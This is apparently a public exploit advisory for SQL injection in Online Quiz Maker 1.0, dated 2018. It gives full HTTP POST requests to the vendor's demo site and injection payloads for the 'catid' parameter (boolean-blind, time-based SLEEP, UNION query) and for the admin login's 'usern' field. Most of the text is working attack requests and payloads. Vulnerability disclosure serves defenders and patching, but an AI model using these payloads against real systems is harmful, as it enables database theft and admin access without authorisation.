# Exploit Title: Online Quiz Maker 1.0 - 'catid' SQL Injection
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.hscripts.com/scripts/php/quiz-maker.php
# Software Link: https://www.hscripts.com/scripts/php/downloads/quiz-maker.zip
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
 
# Description : An attacker can execute SQL commands through the vulnerable
# parameters.
# An authorized user can use the filtering feature and gain full access to
# the database or other server information. There are also XSS
# vulnerabilities.
 
# PoC : SQLi 1 :
# Request(POST):
 
POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1
Host: www.hscripts.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.hscripts.com/scripts/php/quiz-system/quiz-system.php
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
uname=test&catid=1
 
# Parameter: catid (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: 
 
uname=test&catid=1 AND 4815=4815
 
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 
 
uname=test&catid=1 AND SLEEP(5)
 
# Type: UNION query
# Title: Generic UNION query (NULL) - 10 columns
# Payload: 
 
uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x56476b436866655067774c6d786b6e434f59566c7541666363786855764c686b5949486e6a4d6b68,0x7178716271),NULL,NULL,NULL--bocR
 
# PoC : SQLi 2: Admin Login SQL Injection
# Request(POST):
 
POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1
Host: www.hscripts.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://www.hscripts.com/scripts/php/quiz-system/admin/add-category.php
Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
usern=testing&passw=password&type=auth
 
# Parameter: usern (POST)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 
 
usern=testing' AND SLEEP(5) AND 'ZECL'='ZECL&passw=password&type=auth